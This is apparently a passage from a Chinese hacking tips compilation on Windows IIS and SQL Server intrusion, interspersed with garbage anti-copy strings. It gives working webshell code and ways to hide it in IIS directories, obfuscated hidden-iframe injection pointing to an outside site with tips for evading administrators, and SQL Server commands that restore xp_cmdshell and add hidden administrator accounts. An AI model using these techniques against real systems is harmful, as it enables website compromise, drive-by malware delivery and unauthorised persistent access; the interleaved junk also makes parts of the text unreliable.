1、建立非标准目录:mkdir images..\! E# Z( }* s1 t0 i7 N1 y
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp$ A: X! L) S! H! C7 \
通过web访问ASP木马:http://ip/images../news.asp?action=login
1 w% T; w, O# N3 S* m) m4 o6 }如何删除非标准目录:rmdir images..\ /s! T# y9 o8 \; i. S2 m
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
! |0 P3 k+ g1 amkdir programme.asp
' d4 [; n( j1 w% s2 f; L新建1.txt文件内容:<!--#include file=”12.jpg”-->5 {) L: j; P5 |& y
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件+ L3 A2 h8 ~/ `/ L7 T3 P/ H1 p
attrib +H +S programme.asp# @0 p- _3 R' G0 M; h
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt( m! u& x0 M- ~- d# G0 V. w6 C
- ?" j$ g5 t ]2 r w! h2 ~
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。* Q; C5 R. e+ y
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。& I m o0 m" Q
/ d/ @5 a0 [- Z
55、JS隐蔽挂马$ P& O: i# Q! L( k o3 D, G
1.
- x" Q& d! n: Wvar tr4c3="<iframe src=ht";, K& D# m# t% S' \$ w9 N
tr4c3 = tr4c3+"tp:/";9 F& D6 g# r# m7 ]1 h. w
tr4c3 = tr4c3+"/ww";& W- p0 e0 o1 L& R" u/ B3 y
tr4c3 = tr4c3+"w.tr4";
6 e8 x! j( W e1 S' ntr4c3 = tr4c3+"c3.com/inc/m";
7 R3 i% ]8 W8 c, _. S& m8 y+ Str4c3 = tr4c3+"m.htm style="display:none"></i";
% V6 t) o% Y9 F: |tr4c3 =tr4c3+"frame>'";0 W, `& E0 i7 L7 E. i3 B
document.write(tr4c3);' [" Z6 q. s/ w% s+ ~ S0 g4 A( l6 @
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
: l' V- l0 g; _' ^0 B) v3 Y' c+ j% _8 c! S" s& n
2.
6 M& y* B/ V( |2 W转换进制,然后用EVAL执行。如
/ l) l0 I5 c, k9 q b2 teval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");2 h- R& ^) ?1 U9 K
不过这个有点显眼。
' g* m& H& V# N3.
9 G. T2 Y( U! T! P$ }document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');7 H. s! C' R( O- |. M& W) i D# w
最后一点,别忘了把文件的时间也修改下。, E! X6 D4 U2 v# ~ H' q
2 C5 l7 d7 e. [, z/ e; j! |( F56.3389终端入侵常用DOS命令
# c) ^4 W. `+ H6 h" @ Y' Ataskkill taskkill /PID 1248 /t9 A" i2 S" M: i8 u7 D, r
~; g: |% ^$ g3 f. X% stasklist 查进程& W2 e7 @' H1 C4 }
( ]2 i+ m0 r3 u/ ]1 D0 ]3 a' D
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
9 Z' o/ Z& {$ D: {iisreset /reboot
/ Y/ r( E( Z+ k- d' C5 Atsshutdn /reboot /delay:1 重起服务器
( B3 j" o' e% Y1 G" T) q, w( u& M6 | m8 g
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
) `/ u+ J: H3 u0 e2 k, ]0 r- i' m% x. s# b
query user 查看当前终端用户在线情况1 j1 j6 g! d1 X3 X! L6 I
+ E( s! ^# Z* A+ p# N+ X# ^/ M
要显示有关所有会话使用的进程的信息,请键入:query process *& D0 _8 j: u: N0 n, j
1 G0 }( D; X8 O# }6 m, i- p' C
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
/ V* l* c2 d$ g' J: c& g
2 ~1 b/ Q" ? U4 V: X4 N* j# r. ~要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# q/ L1 z9 O# \+ F+ ?& @- E) y/ {6 ?0 F1 {
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
* v) B ?& `1 t1 m9 S5 x/ L0 C8 S- ^9 V
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启+ d, ` h# C- H+ O8 D8 f
) y/ @% |! M, L: ^" C6 [命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
0 I" h* m% R3 n V( W* Z% q( b" D2 S$ N) w
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
Y% w8 Q7 m" |/ }' d/ q7 u. ~ L0 W# g* z: E- a* D, T6 E# R* N c+ I
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
2 g' \3 n4 g1 w n% m6 s8 M3 R ]; [; n
56、在地址栏或按Ctrl+O,输入:
6 _: R" g/ U4 zjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
0 [* B# n4 R5 x H$ b. ?9 o) P8 j1 k* y. A5 T' H8 U
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
1 G/ |3 h- @$ j9 L/ k) O5 ~0 m- P% e2 s' c4 b. p3 o* Q+ M2 X
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
8 S2 h* f* Y- a9 R用net localgroup administrators是可以看到管理组下,加了$的用户的。% t3 G' R' O& Y, y4 y+ y% Q
. w8 @4 i8 h9 j8 A$ A" u Y+ w58、 sa弱口令相关命令7 B( _) m- c/ W4 I6 W
! g! z9 _# I, Z i$ e; ~
一.更改sa口令方法:4 \0 P' D3 f* y% S9 l
用sql综合利用工具连接后,执行命令:
$ o( a. {- j, }' O# ?" a4 bexec sp_password NULL,'20001001','sa'0 \8 r: l$ F2 F( _$ z! ~# C
(提示:慎用!)
+ Z6 R: Z f: y4 W6 ?! o4 y( H# W0 F
二.简单修补sa弱口令.
5 x" J% r9 e7 R7 r' s2 }' Q/ i1 _8 C4 ?* j% V3 k! j
方法1:查询分离器连接后执行:/ r5 k1 G1 f8 ^ `, t2 Y
if exists (select * from% {5 M- P( I4 ^/ ?) E& [6 @- V
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and6 q1 a7 H+ s' Z* C2 M/ `# n
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)) d# c8 s+ C' R* u4 m
y+ o! D5 Y0 I, V( {: H r) m' kexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
' y, U& r# ?7 @" b, u
* y2 E+ m6 n$ }5 q5 H9 S" C( iGO
[- ]4 U; Y6 y) J
( ^! Y5 ~1 w( W3 P8 T: b- J然后按F5键命令执行完毕
$ _7 T9 M* y, ]; a- B4 B/ A( f+ e6 k6 J! a) s- P, f
方法2:查询分离器连接后$ }5 P& x1 f$ N+ q. m. h
第一步执行:use master
( { R; B3 b2 m; `: W& s第二步执行:sp_dropextendedproc 'xp_cmdshell'# a( H7 s& }0 y; X! _% _
然后按F5键命令执行完毕
; M- Z2 ?' e/ z1 J$ \3 A) n! L
/ b/ R/ U8 d4 H8 f, T0 y* \6 Z/ N
4 y9 E+ R; W$ @$ K: @三.常见情况恢复执行xp_cmdshell.( w. \5 f% A& N \. ?$ l5 x. Z t- g
9 a/ s* ^1 D) q+ q& q
8 k) ^2 t2 ^, Z$ L8 c. D1 未能找到存储过程'master..xpcmdshell'.
. F6 A& g" ?+ o/ d 恢复方法:查询分离器连接后,
: ~8 \' K5 r- ]$ M5 |& V% w第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* e% {+ k+ Y6 Q/ [第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'# W4 b# e0 |: w8 l/ @( T
然后按F5键命令执行完毕
) b/ {( n0 }/ z' Y( F! ]4 k# x
* v8 r+ e$ q! _3 l4 j/ H. B/ Y2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
N/ {1 G: _' O1 v. n" p恢复方法:查询分离器连接后,' P; M7 h6 Y8 M. g7 h
第一步执行:sp_dropextendedproc "xp_cmdshell"
# v8 D. p! Z% W: L3 r" i0 r第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- u0 W! Y1 o; w+ v- D! Q. T然后按F5键命令执行完毕
K p0 W) v: `3 [. }% k' _/ a" @2 ]; C* M" z
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)9 t! q6 y# Z) \3 W; Z0 s8 }- m
恢复方法:查询分离器连接后,; c/ l: `# a* q# x( _ N
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
9 ]2 M A' g& a第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' 4 y6 a" U5 B7 K4 p' o; c4 I
然后按F5键命令执行完毕
) R+ p( l U/ h; [$ d7 j% ?# d
7 H$ I0 D: y8 `% J四.终极方法.
# O# U0 P$ K7 ]5 c, t! L6 k9 z% F如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
& i. k$ ]4 z+ `. e. f0 h% A+ ^查询分离器连接后,
9 d* F/ I8 u; a/ O, J7 Z/ K" ^; V2000servser系统:
, n) e/ Z. o) ?3 j( ]. h/ Mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
$ d; e5 Y; ]) h3 Z; g/ J
3 r. x- E4 q; d# a8 n. C0 D' Fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'# o7 S6 S) J2 Q: C; }1 g$ d
K1 A5 `* b4 I) c9 a
xp或2003server系统:5 C1 x* S/ I' F( ^
5 {* g" Z; z$ R0 U
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add': @1 m6 y8 w D% B) ^( E
% i- n) R+ @& G% G" @, ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'! T; y9 p2 N3 X, X# {' Y: \
|